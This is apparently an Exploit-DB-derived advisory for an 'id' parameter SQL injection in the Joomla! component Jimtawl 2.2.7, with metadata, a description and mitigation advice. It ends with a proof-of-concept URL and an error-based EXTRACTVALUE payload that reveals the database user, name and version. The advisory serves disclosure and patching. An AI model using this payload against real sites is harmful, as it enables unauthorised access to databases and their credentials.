Joomla! Component Jimtawl 2.2.7 - 'id' SQL Injection

vendor:

Jimtawl

by:

Ihsan Sencan

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Jimtawl

Affected Version From: 2.2.7

Affected Version To: 2.2.8

Patch Exists: Yes

Related CWE: N/A

CPE: a:janguo:jimtawl

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Joomla! Component Jimtawl 2.2.7 – ‘id’ SQL Injection

A SQL injection vulnerability exists in Joomla! Component Jimtawl 2.2.7, which allows an attacker to inject malicious SQL queries via the 'id' parameter in the 'index.php' script. An attacker can exploit this vulnerability to gain access to sensitive information from the database, such as usernames and passwords.

Mitigation:

The vendor has released an update to address this vulnerability. Users should upgrade to the latest version of Joomla! Component Jimtawl.

Source

Exploit-DB raw data:

# Exploit Title: Joomla! Component Jimtawl 2.2.7 - 'id' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-10-03
# Vendor Homepage: https://janguo.de/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/collection-factory/
# Software Download: https://vd.janguo.de/attachments/download/191/pkg_jimtawl-2.2.8-current-r569.zip
# Version: 2.2.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: NA

# POC: 
# 1)
# http://localhost/[PATH]/index.php?option=com_jimtawl&view=user&task=user.edit&id=[SQL]

' AND EXTRACTVALUE(66,CONCAT(0x5c,(SELECT (ELT(66=66,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))-- VerAyari